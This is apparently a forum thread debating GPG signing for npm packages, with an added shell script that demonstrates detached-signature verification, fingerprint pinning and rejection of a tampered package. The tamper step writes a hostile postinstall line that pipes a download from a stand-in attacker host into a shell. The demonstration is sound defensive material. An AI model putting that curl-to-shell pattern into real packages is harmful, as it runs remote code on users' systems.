by danjoc
3737 days ago
> From where do you get the public key to verify the GPG signature against?

PGP key servers:

hkps.pool.sks-keyservers.net
wwwkeys.pgp.net
pgp.mit.edu

There are plenty more. You upload a public key, they relay them around. Read all about it. http://pgp.mit.edu/faq.html

You can also attach an email address to the public key. You can send an encrypted email to that address and get an encrypted response back proving that the owner of that address has a copy of the private key. Now you just have to trust that package-signer@npmjs.org or whoever can keep his private key safe. You can even store a private key on a Yubikey device to limit theft of the private key to the theft of a physical token.

Not having gpg-signed packages is bad enough. Actively discouraging them and denying that pull request is mind-blowing to me personally. The idea that they are going to invent a better scheme is dangerous. They will screw it up, just like everybody else who ever tried that. Schneier's Law: Any person can invent a security system so clever that he or she can't imagine a way of breaking it.
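The signing-and-verifying flow that the comment above describes, as an added example that is not part of the comment or of any npm code. It assumes GnuPG 2.1 or later is installed; the signer identity (package-signer@example.org, chosen to avoid the real npmjs.org address quoted above), the package contents and all file names are constructed here. The maintainer signs a tarball with a detached signature and exports the public half (what would be uploaded to a keyserver); the verifier imports that public key into its own keyring, checks the signature, and pins the signer's full fingerprint, because a plain exit status of 0 from gpg --verify only means "a good signature from some key in my keyring", not "from the key I expected". A tampered tarball is then shown to fail.

```shell
#!/bin/sh
# Added example, not code from the thread. Detached GPG signing of a package,
# verification against an exported public key with a pinned fingerprint, and a
# tamper check. Runs offline in throwaway keyrings; the signer identity,
# package contents and file names are constructed for the example.
set -eu

# The example needs the gpg binary; skip cleanly where it is absent.
command -v gpg >/dev/null 2>&1 || { echo "gpg not installed, skipping" >&2; exit 0; }

WORK=$(mktemp -d)
SIGNER_HOME="$WORK/signer"     # maintainer's keyring: holds the private key
VERIFIER_HOME="$WORK/verifier" # user's keyring: public keys only
mkdir -m 700 "$SIGNER_HOME" "$VERIFIER_HOME"

# Maintainer side: create a signing-only Ed25519 key with no passphrase so the
# example runs unattended (a real key sits behind a passphrase or on a token).
# Idempotent: a second call reuses the existing key.
make_signer_key() {
    if ! gpg --homedir "$SIGNER_HOME" --batch --list-secret-keys \
            package-signer@example.org >/dev/null 2>&1; then
        gpg --homedir "$SIGNER_HOME" --batch --quiet --gen-key <<EOF
%no-protection
Key-Type: eddsa
Key-Curve: Ed25519
Key-Usage: sign
Name-Real: Package Signer
Name-Email: package-signer@example.org
Expire-Date: 0
%commit
EOF
    fi
    # The public half: this is what a maintainer uploads to a keyserver.
    gpg --homedir "$SIGNER_HOME" --batch --quiet --export --armor \
        package-signer@example.org > "$WORK/signer.pub.asc"
}

# Full 40-hex-digit fingerprint of the signer's key. A verifier should obtain
# this out of band (project site, in person), not from the keyserver itself,
# and pin it; short key IDs are not a substitute.
signer_fingerprint() {
    gpg --homedir "$SIGNER_HOME" --batch --with-colons --fingerprint \
        package-signer@example.org | awk -F: '$1 == "fpr" { print $10; exit }'
}

# Build a constructed "package" and a detached, ASCII-armoured signature.
sign_package() {
    printf 'name=example-pkg\nversion=1.0.0\n' > "$WORK/package.tgz"
    gpg --homedir "$SIGNER_HOME" --batch --quiet --yes \
        --local-user package-signer@example.org \
        --detach-sign --armor --output "$WORK/package.tgz.asc" "$WORK/package.tgz"
}

# Verifier side: import the public key (as if fetched from a keyserver), then
# verify. gpg's exit status alone says "good signature from some key in my
# keyring"; the VALIDSIG status line names the signing key's fingerprint, which
# is compared against the pinned value. Returns 0 only for a good signature
# from the expected key, 1 otherwise (bad signature, unknown key, wrong key).
verify_package() {
    pkg=$1; sig=$2; pubkey=$3; expected_fpr=$4
    gpg --homedir "$VERIFIER_HOME" --batch --quiet --import "$pubkey" 2>/dev/null
    status=$(gpg --homedir "$VERIFIER_HOME" --batch --status-fd 1 \
        --verify "$sig" "$pkg" 2>/dev/null) || return 1
    printf '%s\n' "$status" | grep -q "^\[GNUPG:\] VALIDSIG $expected_fpr " || return 1
    return 0
}

# Modify the package after signing; the detached signature must stop verifying.
tamper_package() {
    printf 'postinstall=curl http://evil.example/x | sh\n' >> "$WORK/package.tgz"
}

main() {
    make_signer_key
    fpr=$(signer_fingerprint)
    sign_package
    if verify_package "$WORK/package.tgz" "$WORK/package.tgz.asc" \
            "$WORK/signer.pub.asc" "$fpr"; then
        echo "good signature from pinned key $fpr"
    fi
    tamper_package
    if ! verify_package "$WORK/package.tgz" "$WORK/package.tgz.asc" \
            "$WORK/signer.pub.asc" "$fpr"; then
        echo "tampered package rejected"
    fi
}
main
```

Note what the keyserver does and does not give you here: it delivers key material for an email address, and anyone can upload a key claiming that address, so the fingerprint comparison in verify_package is the step that turns "a signature verifies" into "the maintainer signed this". The fingerprint has to come from somewhere other than the keyserver, and, as the comment says, you still have to trust that the maintainer keeps the private key safe.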
Which is exactly the point that you're missing. "The idea that they are going to invent a better scheme"—by "better scheme" you're thinking more secure, but the only people under the impression that NPM thinks they're going to invent a more secure system are people making the strawman argument you are. The strawman is that NPM's scheme isn't intended to be "better" in the sense of being more secure, it's intended to be better in the sense of improving the community in all the ways that aren't security.
That's wonderful and I love reading about it, I'm sure it works great for you, but surely you're aware that the vast majority of the world doesn't use encrypted email or PGP or any of the other decades-old cryptographic technologies. NPM doesn't think they're going to invent a scheme that's more secure than all that. NPM thinks they're going to invent a scheme that's more successful than all that.